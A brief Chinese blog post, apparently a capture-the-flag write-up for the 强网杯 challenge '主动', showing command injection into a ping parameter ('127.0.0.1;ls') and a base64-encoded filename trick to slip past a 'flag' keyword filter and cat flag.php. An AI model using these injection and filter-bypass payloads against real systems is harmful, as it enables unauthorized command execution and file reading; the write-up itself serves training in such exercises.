您的位置: 首页 > 文章 > 强网杯-主动 强网杯-主动 分类: 文章 • 2022-10-04 00:10:31 打开环境 看到ping -c 3,属于命令注入 尝试传递ip=127.0.0.1;ls 得到 显然if里面的内容过滤掉了flag,而我们需要读取flag.php内的内容 使用通配符Base64编码绕过 ?id=1;cat echo 'Li9mbGFnLnBocAo=' | base64 -d: 用cat读取flag f12查看